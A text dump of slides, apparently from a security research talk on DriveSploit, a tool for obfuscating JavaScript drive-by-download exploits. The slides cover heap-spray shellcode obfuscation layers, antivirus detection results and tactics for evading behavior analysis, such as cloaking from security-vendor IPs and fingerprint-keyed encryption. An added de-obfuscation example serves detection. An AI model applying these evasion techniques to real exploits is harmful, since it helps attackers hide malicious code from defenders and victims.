• 55. JAVASCRIPT EXPLOIT DISEC – Shellcode / M Corrupt / Heapspray / Trigger → OBFUSCATED BLOB → DE-OBFUSCATOR. Primitive Form → Obfuscated Form. Step: Start
• 56. JAVASCRIPT EXPLOIT DISEC – Shellcode / M Corrupt / Heapspray / Trigger → OBFUSCATED BLOB → DE-OBFUSCATOR. Primitive Form → Obfuscated Form. Steps: Start, Mutate
• 57. JAVASCRIPT EXPLOIT DISEC – Shellcode / M Corrupt / Heapspray / Trigger → OBFUSCATED BLOB → DE-OBFUSCATOR. Primitive Form → Obfuscated Form. Steps: Start, Mutate, Prevent
• 59. 1. Javascript Random Variable Auto Replacement • Accepts a piece of JavaScript • Parses the JavaScript according to grammar • Auto replaces all variable names and function names with random names • Passes back: a) the new JavaScript b) a vector of old-new name mappings
• 60. 1. Javascript Random Variable Auto Replacement
  randomized = Rex::Exploitation::DriveSploit::obfuscatejs(js, Rex::Exploitation::DriveSploit::AUTO_RANDOM_VARS)
• 61. 2. Javascript Concat String Obfuscation
  arr = Rex::Exploitation::DriveSploit.obfuscatejs(shellcode, Rex::Exploitation::DriveSploit::STRING_CONCAT)
  shellcode_script = arr[0]
  shellcode_var = arr[1]
• 62. 2. Javascript Concat String Obfuscation – original: %u7679%u4673%u757%u924e. Split into literals: A1 = "%u7"; A2 = "679%"; A3 = "u4673%"; A4 = "u75"; A5 = "7%u92"; A6 = "4e"; (then emitted in shuffled order: A3 = "u4673%"; A1 = "%u7"; A4 = "u75"; A5 = "7%u92"; A2 = "679%"; A6 = "4e";)
• 63. 2. Javascript Concat String Obfuscation – original: %u7679%u4673%u757%u924e. Layer 2: A3 = "u4673%"; A4 = "u75"; A1 = "%u7"; A5 = "7%u92"; A2 = "679%"; A6 = "4e"; B1 = A1+A2; B2 = A3+A4; B3 = A5+A6;
• 64. 2. Javascript Concat String Obfuscation – original: %u7679%u4673%u757%u924e. Layer-2 names randomized: B1 = A1+A2; B2 = A3+A4; B3 = A5+A6; becomes B2 = A1+A2; B1 = A3+A4; B3 = A5+A6;
• 65. 2. Javascript Concat String Obfuscation – original: %u7679%u4673%u757%u924e. Result: A3 = "u4673%"; A4 = "u75"; A1 = "%u7"; A5 = "7%u92"; A2 = "679%"; A6 = "4e"; B2 = A1+A2; B1 = A3+A4; B3 = A5+A6; C1=B1+B2; D1=C1+B3; // variable names are randomized
• 66. 3. Javascript Random Text Insertion
  insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10)
  shellcode = insertret[0]
  random_insertion_string = insertret[1]
• 67. 3. Javascript Random Text Insertion
  insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10)
  # insert a fixed 6-character random string, for every 4-8 characters
  Returns: a) a piece of JavaScript containing the injected string b) the JavaScript variable name containing the reverted, original string
• 68. 4. Numeric Literal Mutation
  slackspace = Rex::Exploitation::Drivesploit.obfuscateNumber(0x86000)
• 69. 4. Numeric Literal Mutation
  slackspace = Rex::Exploitation::Drivesploit.obfuscateNumber(0x86000)
  → (246*2)+(5676*96)+(34*4)+8+(3332*1)
• 70. 4. Numeric Literal Mutation
  slackspace = 0x86000
  becomes
  slackspace = (246*2)+(5676*96)+(34*4)+8+(3332*1)
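The concat-string layers (slides 61-65) and the numeric literal mutation (slides 68-70) are both undone by plain constant folding, which is what a static scanner has to do before signature matching can see the original literals again. The following is an added example and is not DriveSploit or Armorize code; the sample script is constructed to mirror the slides, and the `foldNumber`, `foldStrings` and `scanFolded` names are this example's own.

```javascript
// Added example (not DriveSploit/Armorize code): fold the concat-string and
// numeric-literal-mutation layers so a scanner sees the original literals.
const SAMPLE = [                                   // constructed sample, mirrors the slides
  'A3 = "u4673%";A4 = "u75"; A1 = "%u7"; A5 = "7%u92";A2 = "679%"; A6 = "4e";',
  'B1 = A1+A2; B2 = A3+A4;B3 = A5+A6;C1=B1+B2; D1=C1+B3;',
  'var slackspace = (246*2)+(5676*96)+(34*4)+8+(3332*1); var sc = unescape(D1);',
].join('\n');

// Evaluate an expression made only of digits, + * and parentheses with a tiny
// recursive-descent parser; untrusted script text never reaches eval().
function foldNumber(expr) {
  const s = expr.replace(/\s+/g, '');
  if (!/^[0-9+*()]+$/.test(s)) return null;
  let i = 0;
  const term = () => {
    if (s[i] === '(') { i++; const v = sum(); i++; return v; }
    let j = i; while (j < s.length && /[0-9]/.test(s[j])) j++;
    const v = parseInt(s.slice(i, j), 10); i = j; return v;
  };
  const product = () => { let v = term(); while (s[i] === '*') { i++; v *= term(); } return v; };
  const sum = () => { let v = product(); while (s[i] === '+') { i++; v += product(); } return v; };
  return sum();
}

// Resolve `name = "literal"` and `name = a+b+...` assignments in source order,
// so each concat layer (A -> B -> C -> D) collapses to its final string.
function foldStrings(src) {
  const vars = {};
  const re = /(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*([^;]+);/g;
  for (let m; (m = re.exec(src)) !== null;) {
    const [, name, rhs] = m;
    const parts = rhs.split('+').map(p => p.trim());
    const vals = parts.map(p => /^"[^"]*"$/.test(p) ? p.slice(1, -1) : vars[p]);
    if (vals.every(v => typeof v === 'string')) vars[name] = vals.join('');
    else { const n = foldNumber(rhs); if (n !== null) vars[name] = n; }
  }
  return vars;
}

// Heap-spray indicators that only become visible after folding: a run of
// %uXXXX escapes (shellcode or NOP sled) plus a large slack-space constant.
function scanFolded(src) {
  const vars = foldStrings(src);
  let maxEscapes = 0, bigNumber = 0;
  for (const v of Object.values(vars)) {
    if (typeof v === 'string') maxEscapes = Math.max(maxEscapes, (v.match(/%u[0-9a-fA-F]{4}/g) || []).length);
    else bigNumber = Math.max(bigNumber, v);
  }
  return { vars, maxEscapes, bigNumber, suspicious: maxEscapes >= 3 && bigNumber >= 0x10000 };
}
```

The random-variable layer (slide 60) does not disturb this folding, since names are only used as lookup keys; the random-text-insertion layer (slides 66-67) would need the matching `replace` call folded as well.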
• 71. Trigger Prevention – Shellcode / M Corrupt / Heapspray / Trigger → OBFUSCATED BLOB → DE-OBFUSCATOR. Primitive Form → Obfuscated Form. Steps: Start, Prevent
• 72. Trigger prevention • <div onload • <img onload • var a=1; var b=0; do { useless code; } while (a==b); • Fingerprinting-based encryption
  • 75. RANDOM VARS: 16/42 (某採!)
• 78. ROUGHLY 6/17 ANTI-VIRUS DETECTS BASED ON SHELLCODE (FOR THIS EXPLOIT)
• 83. ANTIVIRUS DESKTOP VERSION • Can monitor host environment – Hook into browsers – Easier to get raw form of exploit • Behavior analysis – Buffer overflow behavior – Download-to-file behavior
• 84. AntiVirus Desktop Kung Fu (columns: To, Ag, Sc, Aa, Ky)
  Plain                     ✖ ✖ ✔ ✔ ✔
  Random variables          ✖ ✖ ✔ ✔ ✔
  Split literals            ✖ ✖ ✔ ✔ ✔
  Injection SC              ✖ ✖ ✔ ✔ ✔
  Concat SC                 ✖ ✖ ✔ ✔ ✔
  Concat CODE               ✖ ✔ ✖ ✔ ✔
  Concat SC + Concat CODE   ✖ ✖ ✖ ✔ ✔
  Inject SC + Concat CODE   ✖ ✖ ✖ ✖ ✔
• 85. AntiVirus Desktop Kung Fu (columns: To, Ag, Sc, Aa, Ky, M)
  Plain                     ✖ ✖ ✔ ✔ ✔ ✔✔
  Random variables          ✖ ✖ ✔ ✔ ✔ ✔✔
  Split literals            ✖ ✖ ✔ ✔ ✔ ✔✔
  Injection SC              ✖ ✖ ✔ ✔ ✔ ✖✔
  Concat SC                 ✖ ✖ ✔ ✔ ✔ ✖✔
  Concat CODE               ✖ ✔ ✖ ✔ ✔ ✖✔
  Concat SC + Concat CODE   ✖ ✖ ✖ ✔ ✔ ✖✔
  Inject SC + Concat CODE   ✖ ✖ ✖ ✖ ✔ ✖✔
• 93. Browser Feature Table (columns: IE7, FF, Safari, Opera, Chrome)
  Is_contextmenu_event_supported                     True  True  True          False True
  String_prototype_replace_ignore_functions          False False True (2.0.2)  False False
  Is_ES5_strict_mode_supported                       False False False         False False
  Array_prototype_slice_can_convert_to_array         False True  True          True  True
  Getelementsbytagname_returns_comment_nodes         True  False False         False False
  Is_element_tagname_uppercased                      True  True  True          True  True
  Is_canvas_element_supported                        False True  True          True  True
  Is_DOMFocusIn_supported                            False False True          True  True
  Is_CSS_boder_radius_supported                      False True  True          False True
  Function_identified_leaks_onto_enclosing_scope     True  False False         False False
  Script_element_rejects_textnode_appending          True  False False         False False
  Is_position_fixed_supported                        False True  True          False True
  Computed_style_return_static_positioned_element    False False False         True  False
• 94. 5. Fingerprinting-Based Encryption Summary • "This exploit works only for IE6" • "Give me an encrypted version of my javascript exploit" • "Give me javascript to generate the decoding key" • "The key is only correctly generated if the javascript is run under IE6"
• 95. 5. Fingerprinting-Based Encryption Summary – A=Check1(); B=Check3(); C=Check4(); D=Check6(); E=Check8(); F=Check9(); G=Check12(); H=Check14();
• 96. 5. Fingerprinting-Based Encryption Summary – A=Check1(); B=Check3(); C=Check4(); D=Check6(); E=Check8(); F=Check9(); G=Check12(); H=Check14(); shuffled to A=Check6(); B=Check12(); C=Check8(); D=Check1(); E=Check4(); F=Check14(); G=Check3(); H=Check9();
• 97. 5. Fingerprinting-Based Encryption Summary – A=Check1(); B=Check3(); C=Check4(); D=Check6(); E=Check8(); F=Check9(); G=Check12(); H=Check14(); shuffled to A=Check6(); B=Check12(); C=Check8(); D=Check1(); E=Check4(); F=Check14(); G=Check3(); H=Check9(); → One-time key → Encrypt javascript exploit → Generate decoding javascript
• 98. Why not Anti-Virus? • AV is to install on desktops / notebooks • Complicated normal behaviors • Strict resource constraints • Therefore, AV and gateway vendors rely on: – Signature-based pattern matching technologies – LIGHTWEIGHT and ACCURATE • Why can't such technology be used to detect drive-by-downloads?
• 99. Javascripts are not harmful to the environment…
• 100. … so they are usually not reused. AV no good because drive-by-downloads are in: • Disposable Javascript • Disposable PDF Adobe JS • Disposable Flash actionscript • All ECMA-scripts; you don't usually reuse them…
• 101. Javascript Packing Is a Norm • Packing is widely used by legitimate code! – To protect javascript source code – To reduce javascript size • Google Closure Compiler – http://code.google.com/closure/compiler/ • Yahoo Javascript Packer (YUI Compressor) – http://developer.yahoo.com/yui/compressor/ • Advanced HTML Protector – http://www.creabit.com/htmlprotect/ • Dean Edwards' Packer – http://dean.edwards.name/packer/ • Online JS Obfuscator – http://www.iwebtool.com/html_encrypter • http://www.cha88.cn/safe/fromCharCode.php
• 102. … OK so AV doesn't work (that well)… How about behavior-based approaches?
• 103. Defeating Behavior Analysis 1. Use VBScript – Exploits in VBScript – URL generators in VBScript – Exploits in / generated by VBScript – May defeat SpiderMonkey et al (Rhino, JSunPack, etc) 2. Don't serve to detectors – You can't detect what you don't have – Serve to each IP only once – Detect agent strings – Collect robot IPs: Google, Yahoo, security vendors
• 104. Defeating Behavior Analysis 3. Fingerprint-based encryption 4. Little but effective techniques – Sleep(30000); // using setTimeout – Timelock puzzles
• 105. Future Work • Randomly chop up scripts and split into individual files • Generating VBScript instead of javascript • Encrypting using data existing outside of HTML – HTTP headers
• 106. Discussion • The Panopticlick experiment by Eckersley of EFF – 94.2% of "typical desktop browsers" are unique • Can fingerprinting-based encryption be integrated with this type of individual fingerprinting, to prevent detection and analysis of targeted attacks?
• 107. THANK YOU! wayne@armorize.com @waynehuang @drivesploit http://www.drivesploit.org Credits: Wayne Huang, Fyodor Yarochkin, Antonio Rohman Fernandez. Special thanks to: Benson Wu, Jeremy Chiu, Kuon Ding, Felix, Cola